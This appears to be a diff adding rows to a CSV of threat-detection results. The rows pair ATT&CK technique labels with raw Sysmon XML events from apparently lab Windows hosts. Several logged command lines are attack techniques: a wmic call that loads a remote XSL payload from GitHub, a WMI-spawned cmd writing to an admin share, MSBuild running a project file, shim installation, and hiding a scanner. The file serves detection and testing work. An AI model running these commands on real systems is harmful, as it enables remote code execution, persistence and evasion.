+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:49:27.787731Z"">
+    </TimeCreated>
+    <EventRecordID>1966388</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:49:27.697</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55D7-5C91-0000-001067BD0700</Data>
+    <Data Name=""ProcessId"">2236</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
+    </TimeCreated>
+    <EventRecordID>421218</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
+    <Data Name=""ProcessId"">2628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
+    </TimeCreated>
+    <EventRecordID>421218</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
+    <Data Name=""ProcessId"">2628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
+    </TimeCreated>
+    <EventRecordID>421218</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3236"" ThreadID=""4832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
+    <Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
+    <Data Name=""ProcessId"">2628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">MSEDGEWIN10\Administrator</Data>
+    <Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
+    <Data Name=""LogonId"">0x33a8a8</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
+    <Data Name=""ParentProcessId"">2228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
+    </TimeCreated>
+    <EventRecordID>4939</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
+    <Data Name=""ProcessId"">4260</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
+    </TimeCreated>
+    <EventRecordID>4939</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
+    <Data Name=""ProcessId"">4260</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-09T22:00:45.589922Z"">
+    </TimeCreated>
+    <EventRecordID>311365</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3280"" ThreadID=""1044"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-09 22:00:45.576</Data>
+    <Data Name=""ProcessGuid"">747F3D96-938D-5F07-0000-001043A84500</Data>
+    <Data Name=""ProcessId"">7976</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
+    <Data Name=""LogonId"">0x68b4a</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
+    <Data Name=""ParentProcessId"">2356</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:49.748805Z"">
+    </TimeCreated>
+    <EventRecordID>4936</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:49.535</Data>
+    <Data Name=""ProcessGuid"">747F3D96-663D-5D3F-0000-00106F608A00</Data>
+    <Data Name=""ProcessId"">3240</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:48:33.870201Z"">
+    </TimeCreated>
+    <EventRecordID>1966382</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:48:33.639</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010D6960700</Data>
+    <Data Name=""ProcessId"">2368</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib  +h nbtscan.exe ) accessing hidden files and directories,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-19T17:32:00.482982Z"">
+    </TimeCreated>
+    <EventRecordID>22013</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1768"" ThreadID=""2272"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories</Data>
+    <Data Name=""UtcTime"">2019-05-19 17:32:00.478</Data>
+    <Data Name=""ProcessGuid"">DFAE8213-9310-5CE1-0000-0010EABA0A00</Data>
+    <Data Name=""ProcessId"">2728</Data>
+    <Data Name=""Image"">C:\Windows\System32\attrib.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
+    <Data Name=""Description"">Attribute Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">attrib  +h nbtscan.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""LogonGuid"">DFAE8213-9133-5CE1-0000-0020CC660500</Data>
+    <Data Name=""LogonId"">0x566cc</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02</Data>
+    <Data Name=""ParentProcessGuid"">DFAE8213-91CC-5CE1-0000-0010BEF40600</Data>
+    <Data Name=""ParentProcessId"">3408</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
